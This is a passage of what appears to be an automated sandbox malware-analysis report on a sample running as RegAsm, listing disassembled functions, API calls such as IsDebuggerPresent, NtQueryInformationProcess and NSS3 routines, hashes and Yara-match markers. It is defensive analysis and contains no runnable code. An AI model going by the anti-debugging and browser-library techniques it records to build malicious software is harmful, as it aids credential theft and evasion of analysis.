Part of subcall function 6CA914C0: TlsGetValue.KERNEL32 ref: 6CA914E0
Part of subcall function 6CA914C0: EnterCriticalSection.KERNEL32 ref: 6CA914F5
Part of subcall function 6CA914C0: PR_Unlock.NSS3 ref: 6CA9150D

PORT_ArenaAlloc_Util.NSS3(?,00000024), ref: 6CA99EE4

Part of subcall function 6CA910C0: TlsGetValue.KERNEL32(?,6CA38802,00000000,00000008,?,6CA2EF74,00000000), ref: 6CA910F3
Part of subcall function 6CA910C0: EnterCriticalSection.KERNEL32(?,?,6CA38802,00000000,00000008,?,6CA2EF74,00000000), ref: 6CA9110C
Part of subcall function 6CA910C0: PL_ArenaAllocate.NSS3(?,?,?,6CA38802,00000000,00000008,?,6CA2EF74,00000000), ref: 6CA91141
Part of subcall function 6CA910C0: PR_Unlock.NSS3(?,?,?,6CA38802,00000000,00000008,?,6CA2EF74,00000000), ref: 6CA91182
Part of subcall function 6CA910C0: TlsGetValue.KERNEL32(?,6CA38802,00000000,00000008,?,6CA2EF74,00000000), ref: 6CA9119C

PR_SetError.NSS3(FFFFE013,00000000), ref: 6CA99F38

Part of subcall function 6CA9D030: PORT_NewArena_Util.NSS3(00000400,00000000,?,00000000,?,6CA99F0B), ref: 6CA9D03B
Part of subcall function 6CA9D030: PORT_ArenaAlloc_Util.NSS3(00000000,00000028), ref: 6CA9D04E
Part of subcall function 6CA9D030: SECOID_FindOIDByTag_Util.NSS3(00000019), ref: 6CA9D07B
Part of subcall function 6CA9D030: SECITEM_CopyItem_Util.NSS3(00000000,-00000018,00000000), ref: 6CA9D08E
Part of subcall function 6CA9D030: PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CA9D09D

PR_SetError.NSS3(FFFFE013,00000000), ref: 6CA99F49
SEC_PKCS7DestroyContentInfo.NSS3(?), ref: 6CA99F59

Part of subcall function 6CA99D60: PORT_ArenaMark_Util.NSS3(?,00000000,?,?,00000000,?,6CA99C5B), ref: 6CA99D82
Part of subcall function 6CA99D60: PORT_ArenaGrow_Util.NSS3(?,?,00000000,?,6CA99C5B), ref: 6CA99DA9
Part of subcall function 6CA99D60: PORT_ArenaGrow_Util.NSS3(?,?,?,?,?,?,?,?,6CA99C5B), ref: 6CA99DCE
Part of subcall function 6CA99D60: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,6CA99C5B), ref: 6CA99E43

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: Util$Arena$Alloc_Value$Arena_CriticalEnterErrorGrow_Mark_SectionUnlock$AllocateContentCopyDestroyFindFreeInfoItem_Tag_
String ID:
API String ID: 4287675220-0
Opcode ID: 132886c8e85c4853bc8e1c53b1aed6ae3bf3f6f8f3c0773f36a280f0f549c6b0
Instruction ID: b17dafa6aa2e4556183251735450dda8f45894d5284d264f77272e5f8df47eff
Opcode Fuzzy Hash: 132886c8e85c4853bc8e1c53b1aed6ae3bf3f6f8f3c0773f36a280f0f549c6b0
Instruction Fuzzy Hash: 9911E9B5F142016FFB009A759E027AAB3D8AF9475CF150134E50F87740FB61E5DD8291

Function 0041D016 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0041D44E
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041D463
UnhandledExceptionFilter.KERNEL32(0043332C), ref: 0041D46E
GetCurrentProcess.KERNEL32(C0000409), ref: 0041D48A
TerminateProcess.KERNEL32(00000000), ref: 0041D491

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: f0bae7c02ec03e9cd254ee3e77ce7dcb23bfee01a8b87353ff1e7fdac0599424
Instruction ID: db72b0d0349af5086fa5416fb06d4d65b4d62ee2eec0edc44458765686740910
Opcode Fuzzy Hash: f0bae7c02ec03e9cd254ee3e77ce7dcb23bfee01a8b87353ff1e7fdac0599424
Instruction Fuzzy Hash: 1921ABB4C01705DFD764DFA9F988A447BB4BF08316F10927AE41887262EBB4D9818F5E

Function 6CB4CDC0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 423stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CB4D086
PR_Malloc.NSS3(00000001), ref: 6CB4D0B9
PR_Free.NSS3(?), ref: 6CB4D138

Strings

>, xrefs: 6CB4CF5B

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: FreeMallocstrlen
String ID: >
API String ID: 1782319670-325317158
Opcode ID: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
Instruction ID: 71fb54c6dfb2a3b73ecd175836d86c7554ba74be0caa07de6752a019002c0047
Opcode Fuzzy Hash: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
Instruction Fuzzy Hash: 89D16B22B8D5D64BEB14487CDCB13EA7793C742374F58C329D5219BBEDE619884BA302

Function 6CAEAD50 Relevance: 6.4, APIs: 4, Instructions: 389COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 041cc09e765a5f0544477d820aee10479960451e4959fefa4e859f2cd7869376
Instruction ID: bebfcf0b2b0d0820224458eba4be288a4e62fe3f8f5094840237f5617afe0be3
Opcode Fuzzy Hash: 041cc09e765a5f0544477d820aee10479960451e4959fefa4e859f2cd7869376
Instruction Fuzzy Hash: 87F10175F022968BDB05CF28DA453AD7BF9AB8B308F19422DC805DB750E770A981DBC1

Function 00411E5D Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,00000000,0065E908,?,?,?,004128A1,?,?,00000000), ref: 00411E7D
GetProcessHeap.KERNEL32(00000000,?,?,?,?,004128A1,?,?,00000000), ref: 00411E8A
HeapAlloc.KERNEL32(00000000,?,?,?,004128A1,?,?,00000000), ref: 00411E91

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocBinaryCryptProcessString
String ID:
API String ID: 1871034439-0
Opcode ID: 7facb7d2e02b845f17d999935560398eb304add6040a2be0650dedebad670ad1
Instruction ID: cc1f0cdc7ec9addca40c1236ae1a006933468a7893b1c2cc3d15f31d1535d567
Opcode Fuzzy Hash: 7facb7d2e02b845f17d999935560398eb304add6040a2be0650dedebad670ad1
Instruction Fuzzy Hash: 3F010C70500309BFDF158FA1DC849AB7BBAFF493A5B248459F90593220E7369E91EA24

Function 0041C0E9 Relevance: 3.1, APIs: 2, Instructions: 63timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,771A83C0,00000000,?,?,?,?,?,?,?,?,0041C5A4,?), ref: 0041C13E
SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,0041C5A4,?), ref: 0041C14C

Part of subcall function 0041B92A: FileTimeToSystemTime.KERNEL32(?,?,?,?,0041C211,?,?,?,?,?,?,?,?,?,?,0041C5B4), ref: 0041B942

Part of subcall function 0041B906: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041B923

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Time$FileSystem$LocalUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 568878067-0
Opcode ID: e18be1e8a3847ab2d69564342152f85ca1bd5b155455464045d2105bdf40e3da
Instruction ID: e9dd666d6f03e3bc2370fb34bb5a4ee32d8a7198e314cb59bed8413d438bc6b2
Opcode Fuzzy Hash: e18be1e8a3847ab2d69564342152f85ca1bd5b155455464045d2105bdf40e3da
Instruction Fuzzy Hash: D421E6B19002099FCF44DF69D9806ED7BF5FF08300F1041BAE949EA21AE7398945DFA4

Function 0040145B Relevance: 3.0, APIs: 2, Instructions: 22nativeCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000007,00000000,00000004,00000000), ref: 0040146D
NtQueryInformationProcess.NTDLL(00000000), ref: 00401474

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process$CurrentInformationQuery
String ID:
API String ID: 3953534283-0
Opcode ID: 4ad97b2d1b6fe464e896af9ca2ec5f1d337a2bfbe60684343260282f6ee0994e
Instruction ID: b0d32a7bd978dbc9842abeebd7712166406d741a383243a14520f93e3bb00ea5
Opcode Fuzzy Hash: 4ad97b2d1b6fe464e896af9ca2ec5f1d337a2bfbe60684343260282f6ee0994e
Instruction Fuzzy Hash: 23E01271640304F7EF109BA0DD0AF5F72AC9700749F201175A606E60E0D6B8DA009A69

Function 0042B556 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

EnumSystemLocalesA.KERNEL32(Function_0002B1C1,00000001), ref: 0042B56F

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: EnumLocalesSystem
String ID:
API String ID: 2099609381-0
Opcode ID: 50f329e47e560d397284a7460fab74257ebf44bd3fd5d611c322744838e49ff6
Instruction ID: a965a9a856964b19ccfd622dabb5ac07b34b26fd65f40016140b6e3a2338ef0b
Opcode Fuzzy Hash: 50f329e47e560d397284a7460fab74257ebf44bd3fd5d611c322744838e49ff6
Instruction Fuzzy Hash: 20D05E71B50700ABD7204F30AD497B177A0EB20B16F70994ADC92490C0D7B865D58649

Function 0042762E Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_000275EC), ref: 00427633

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: aa3703d3437d06fb50dade6e7388276a3799fb2df3744491841b8284a36df350
Instruction ID: 9d6a1cee47f635cf13ac9ce2c832d8e993c26a4a09d493c42fccfa592e4f4ed0
Opcode Fuzzy Hash: aa3703d3437d06fb50dade6e7388276a3799fb2df3744491841b8284a36df350
Instruction Fuzzy Hash: 109002A035E250578A0217716C1D50565946A48706B951561A001C4454DBA580409919

Function 6CA28EA0 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5590ddb18285fa4c97b804f9ac07ea5ce2912f9006046228dac807590d1eab00
Instruction ID: bbb2639379bab99e8b672aec0e2a1e9e1f03f2e67c0d62a99cde60abba6f219c
Opcode Fuzzy Hash: 5590ddb18285fa4c97b804f9ac07ea5ce2912f9006046228dac807590d1eab00
Instruction Fuzzy Hash: AF11BF33A012259BD714CF24D88475AB3B9BF4231CF1C426AE8158FA41C779E8C6C7C1

Function 6CB00C40 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0d62143c96d0abf6e3b7eb8ebcf3c6e2afe4eb46a0eec064ae27eba2fe3721b
Instruction ID: ba3e5d2b2d588859487d63c4105e7464ab47f5902687e5395d6a6cf0030282c4
Opcode Fuzzy Hash: d0d62143c96d0abf6e3b7eb8ebcf3c6e2afe4eb46a0eec064ae27eba2fe3721b
Instruction Fuzzy Hash: 9511CE787043859FCB10DF28D88066B7BA6FF85368F148069D8198BB01DB32E806CBA1

Function 6CB00D60 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
Instruction ID: 45d5a4fb270d1cb3321be10667798138ba4c47f8d8d2d0047936e76bd2ca2758
Opcode Fuzzy Hash: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
Instruction Fuzzy Hash: FCE06D3A3020A4A7DB148E09E450AA97B59DF82619FA48179CC599BA01DE33F803C7A2

Function 0040111D Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f96b6833605b0715f9484dbe982297a654c379e9a96f2571680b3f7b5e8fa17
Instruction ID: 43cdf4ecb647160fda175e5076d83385583e07dd488e496ff266cef725db0fb4
Opcode Fuzzy Hash: 9f96b6833605b0715f9484dbe982297a654c379e9a96f2571680b3f7b5e8fa17
Instruction Fuzzy Hash: 7ED092B1509719AFDB288F5AE480896FBE8EE48274750C42EE8AE97700C231A8408B90

Function 00418599 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35f880b7d9409492cfbd2c31b6ba08b67b52b83fed8c053745051b7244bb587c
Instruction ID: 81b03007a1f881deed44a42fc0175a6fbd256bce6d09bf2effb1e14420dd7128
Opcode Fuzzy Hash: 35f880b7d9409492cfbd2c31b6ba08b67b52b83fed8c053745051b7244bb587c
Instruction Fuzzy Hash: DEE04278A55644DFC741CF58D195E99B7F0EB09368F158199E806DB761C274EE00DF00

Function 0041859A Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8d911352b7be11e8ef3f8d43dc69cd37138e10f06c97852b63a715cd4b250d5
Instruction ID: d256f1c99479b207678580fcb63197705f640815169115519c5f26934de16b0c
Opcode Fuzzy Hash: f8d911352b7be11e8ef3f8d43dc69cd37138e10f06c97852b63a715cd4b250d5
Instruction Fuzzy Hash: 1AE06C78A61648EFC740CF48C185E49B3F8FB09768F118095E905DB321C378EE00EB50

Function 0040148A Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
